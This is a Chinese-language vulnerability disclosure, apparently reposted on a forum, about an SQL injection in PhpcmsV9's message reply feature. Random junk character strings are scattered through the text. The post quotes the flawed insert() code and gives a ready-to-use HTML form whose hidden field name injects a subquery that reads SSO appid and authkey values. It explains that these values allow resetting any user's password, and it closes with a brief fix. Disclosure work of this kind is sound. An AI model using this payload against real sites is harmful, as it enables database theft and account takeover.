PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

$ i# @, W5 f, P% T1 }1 o% O* s2 d) h第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
/ C+ {9 R- `9 p+ Y5 `. B1 T& p6 Q* W
  J! Z: {8 C! H- J3 P2 i5 V明天再更新下一个漏洞。
详细说明：
/ l" ~* K& M# n# j  R% k在/phpcms9/phpcms/modules/message/index.php中有代码如下：
1 b! k) B6 ^# H: c! G9 Y
) I( u9 R3 n) i% N+ g) M, {$messageid = $this->message_db->insert($_POST['info'],true);

* g' a. C/ z; g
5 H" }2 T) B0 m. d+ Oinsert方法是key value的，代码如下：
: k# O" X, g- }9 d' N, n
  J  \5 d- D8 Y, o& x+ b  D- \7 spublic function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
                        return false;
8 F8 @/ q9 I4 e( o7 v( F! s- g! T                }
               
; v  F8 w+ ~+ B/ Z- z% `2 `1 o5 V/ H                $fielddata = array_keys($data);
                $valuedata = array_values($data);
5 U& }  ]4 ^- J# V2 k3 F, e# s                array_walk($fielddata, array($this, 'add_special_char'));
                array_walk($valuedata, array($this, 'escape_string'));
               
5 F- Z# {, |- E# H6 ?: a3 P                $field = implode (',', $fielddata);
                $value = implode (',', $valuedata);
' l: l/ I+ \7 ^6 k, z8 f1 @% O
                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
, I# a9 o! A4 b1 f+ e# N4 E                $return = $this->execute($sql);
6 p+ j; K% @# G" A1 h1 j3 m                return $return_insert_id ? $this->insert_id() : $return;
        }
* H' G/ b, d1 i; Q

嗯，很遗憾的是

, C2 E  t9 O7 garray_walk($fielddata, array($this, 'add_special_char'));
9 L2 ], Q0 ~0 o) k; |, D( s
0 x5 {* N$ I$ f# L3 y
  k/ @. H. `, S) p中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。
$ }/ W8 E1 h" t$ \9 K5 ~' T
0 I$ y$ y$ [  @到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
# Y! ]# z, l% X9 H- G& k
3 k) w6 o: D% T
; a" ?% b3 l# k8 Q6 Q/ v表单如下：用户名什么的得自己改一改。
$ x& p6 ?( ?3 u2 c( m" e<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
+ _# m6 E+ t! W6 v<table width="100%" cellspacing="0" class="table_form">
  w: y2 r0 C* t9 Q& c$ s% H+ {7 c" O. L<tr>
<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
</tr>
% A* j- \4 ]- y<tr>
<th>内 容：</th>
<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
: x& g$ u; [$ O/ l</tr>
<input type="hidden" name="info[replyid]" value="2" />
<input type="hidden" name="info[send_to_id]" value="cc" />
9 e) q9 J* N3 ^! J" U<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
! u9 o+ z1 l  W6 g- B/ ^<!-- 漏洞的利用重点在这里结束 -->
5 a6 W! R  i% D5 p6 {" t<tr>
<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
& u6 D4 E; Q+ o* u" K<tr>
<td></td>
<td colspan="2"><label>
/ Y7 v9 b) q& i9 |( O<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
4 S) Y1 X- M7 f( y- p</label></td>
</tr>
1 e4 c! j; P/ Q# X7 X6 `- }) M- f</table>
</form>
- ~1 ^+ [! Y/ I8 B* E在add_special_char函数内对key做过滤就可以了。


; x! K) ?4 l' y, j; r' A8 D